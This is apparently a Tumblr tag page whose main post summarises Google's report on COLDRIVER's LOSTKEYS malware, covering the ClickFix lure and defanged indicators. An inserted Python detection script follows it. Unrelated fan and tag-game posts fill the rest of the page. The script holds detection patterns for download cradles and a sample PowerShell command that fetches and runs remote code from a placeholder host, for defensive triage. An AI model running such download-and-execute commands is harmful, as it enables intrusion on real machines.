#VisualBasicScript
govindhtech · 1 day ago
Text
UNC4057 LOSTKEYS Malware Targets Western NGOs
UNC4057 LOSTKEYS
The Russian government-backed outfit COLDRIVER targets Western and non-governmental organisations with its latest spyware, LOSTKEYS.
The Russian government-backed threat organisation COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) has stolen data from NGOs and Western targets using LOSTKEYS, a new virus. The Google Threat Intelligence Group (GTIG) has been tracking COLDRIVER for years, including its SPICA malware in 2024, and believes LOSTKEYS is a new tool.
COLDRIVER focusses on credential phishing against high-profile targets. People at NGO or personal email addresses are generally targeted. They steal login passwords, emails, and contact lists after gaining access to a target's account. COLDRIVER may also access system files and infect devices with malware.
COLDRIVER has attacked journalists, think tanks, NGOs, and past and current Western government and military advisors. Plus, the gang has kept targeting Ukrainians. COLDRIVER's principal goal is to acquire intelligence for Russia's strategic goals. In several cases, the gang hacked and leaked NGO and UK official data.
January, March, and April 2025 saw the discovery of LOSTKEYS malware. The malicious application may take files from a hard-coded set of folders and extensions and transmit system details and running processes to the attacker. COLDRIVER normally utilises credentials to access contacts and emails, although they have utilised SPICA to access target system documents. LOSTKEYS has a unique purpose and is utilised in certain scenarios.
The multi-step LOSTKEYS infection chain begins with a tempting website featuring a fake CAPTCHA. After the CAPTCHA is “verified,” the PowerShell code is transferred to the user's clipboard and the page invites them to execute it using Windows' “run” prompt. The “ClickFix” approach includes socially engineering targets to copy, paste, and run PowerShell scripts. Google Threat Intelligence Group said many APT and financially driven attackers use this method, which has been well documented.
The first stage's PowerShell fetches the second step. In numerous instances, the IP address 165.227.148[.]68 provided this second step. The second step computes the MD5 hash of the display resolution and stops execution if it matches one of three specified values. This step may avoid virtual machine execution. The request must contain IDs unique to each observed instance of this chain to proceed. In every observation, the third stage comes from the same host as the previous phases.
Base64-encoded blobs decode into additional PowerShell in the third phase. This step retrieves and decodes the latest LOSTKEYS payload. It does this by downloading two additional files from the same host using different identifiers for each infection chain. The first-downloaded Visual Basic Script (VBS) file decodes the second file. Each infection chain is decoded with two keys. One unique key is in the decoder script, while stage 3 supplies the second. The keys are used in a substitution cipher to decode the encoded data.
The final payload is LOSTKEYS VBS. File theft and system data collection are its purposes.
Two more LOSTKEYS samples dated December 2023 were uncovered during the investigation of this activity. These previous PE files posing as Maltego files differ greatly from the execution chain starting in 2025. It is unclear if these December 2023 samples are related to COLDRIVER or if the malware was reused from another operation into January 2025. Shared Indicators of Compromise (IOCs) include binary hashes and C2 addresses like njala[.]dev and 80.66.88[.]67.
Google Threat Intelligence Group uses threat actor research like COLDRIVER to improve product security and safety to safeguard consumers. Once detected, hazardous websites, domains, and files are added to Safe Browsing to protect users. Targeted Gmail and Workspace users received government-backed attacker warnings. Potential targets should enrol in Google's Advanced Protection Program, enable Chrome's Enhanced Safe Browsing, and update all devices.
Google shares its findings with the security community to raise awareness and help targeted companies and people. Sharing methods and approaches improves threat hunting and sector user protections. The original post comprises YARA rules and compromise indicators and is available as a Google Threat Intelligence collection and rule bundle.
0 notes
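The ClickFix step described in the post above (a page tells the victim to paste PowerShell into the Windows Run prompt, which then downloads and runs the next stage) leaves a recognisable trace in process-creation telemetry: an interactive shell such as explorer.exe spawning a script host with hidden-window, encoded-command and download-cradle switches. The following is an added example of how a detection engineer might triage such events; it is not GTIG's detection logic and not LOSTKEYS code. The process events, the weights, the threshold and the URL example.invalid are all constructed for illustration and are assumptions, not indicators from the post.

```python
"""Heuristic triage of process-creation events for ClickFix-style script-host launches.

Added illustration, not code from the post or from GTIG. Field names mirror Sysmon
Event ID 1 / Windows Security 4688 (ParentImage, Image, CommandLine); the events,
weights, threshold and URL below are constructed for the example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record."""
    parent_image: str
    image: str
    command_line: str


# The Win+R "Run" prompt is hosted by explorer.exe, so a pasted command shows up
# as explorer.exe directly spawning the script host (assumption: no other launcher).
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# (compiled pattern, label, weight); each matching pattern contributes its weight once.
INDICATORS = [
    # -w h / -w hidden / -win hidden / -windowstyle hidden
    (re.compile(r"(?i)-w(in(dowstyle)?)?\s+h(id(den)?)?\b"), "hidden-window", 2),
    # -e / -ec / -enc / -encodedcommand followed by a base64 blob
    (re.compile(r"(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"), "encoded-command", 2),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "invoke-expression", 2),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|net\.webclient"),
     "download-cradle", 2),
    (re.compile(r"(?i)-e(p|xecutionpolicy)\s+(bypass|unrestricted)"), "execution-policy-bypass", 1),
    (re.compile(r"(?i)https?://"), "remote-url", 1),
]

ALERT_THRESHOLD = 5  # constructed cut-off: parent + two strong indicators, or similar


def _basename(path: str) -> str:
    """Last path component, tolerant of both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one event; only script hosts are in scope."""
    reasons: list[str] = []
    score = 0
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return 0, reasons
    parent = _basename(ev.parent_image)
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"script host spawned by interactive shell {parent}")
    for pattern, label, weight in INDICATORS:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Events whose score reaches ALERT_THRESHOLD, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    # ClickFix-style paste into the Run prompt: explorer.exe is the parent.
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/verify.txt -UseBasicParsing)"',
    ),
    # Routine admin use from a console window.
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell Get-Process | Sort-Object CPU -Descending",
    ),
    # Scheduled task running a local script: no interactive parent, no cradle.
    ProcessEvent(
        r"C:\Windows\System32\svchost.exe",
        r"C:\Program Files\PowerShell\7\pwsh.exe",
        r"pwsh -NoProfile -File C:\ops\inventory.ps1",
    ),
    # Not a script host at all: out of scope.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Notepad++\notepad++.exe",
                 "notepad++.exe notes.txt"),
]


if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"score={score} {_basename(ev.parent_image)} -> {_basename(ev.image)}")
        for r in reasons:
            print(f"  - {r}")
```

The scoring is deliberately additive rather than a single regex so that a benign `iwr` from a console, or a hidden window launched by a scheduled task, does not fire on its own; only the combination of an interactive parent with download-and-execute switches crosses the threshold. In a real environment the parent set and weights need tuning against the baseline of the fleet.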
chipadequeso · 10 months ago
Text
my fav attack ive done every day for the first week of art fight ! — @dykeseesgod / irlMADSCIENTIST / @visualbasicscript + estate / dykeseesgod again / rolo / @tinytoniichka / @ratsbypaulzindel
(everyone credited as their tumblr or art fight username)
21 notes · View notes
memphisbelle · 7 months ago
Text
tagged by @petoskeystones and @thedissociatives tysm ! :]
last song: this modern love by bloc party
currently watching: my friends and i are in a terror rewatch phase but i’m also slowly picking my way through criminal minds s11
last movie i watched: ‘one life’, the film about nicholas winton and the children he saved from then czechoslovakia in 1938 !
sweet/spicy/savoury: hmm. i do like savoury but i’m partial to sweet things every now n then
relationship status: i have a partner :]
current obsession: the terror / franklin expedition for sure but i am trying to get back into the rhythm of hockey too
last thing i googled: i think it was the website that shows my uni timetable LOL classes start tomorrow and i’m really looking forward to it !!
tagging @legobrickcow @solipseismic @visualbasicscript but no pressure ofc !
5 notes · View notes
hugochamberblog · 5 years ago
Photo
5 of the Worst Computer Viruses Ever Michael Aranda explains five of the wo... #hugochamber #aranda #bot-net #coder #computer #drive-bydownload #education #green #hacker #hank #iloveyou #macro #malicious #man-in-the-browser #masterbootrecord #mebroot #melissa #michael #programmers #science #scishow #socialengineering #stormworm #torpig #virus #viruses #visualbasicscript #worm Source: https://hugochamber.org/5-of-the-worst-computer-viruses-ever/?feed_id=10963&_unique_id=5f2f7aa17f641
0 notes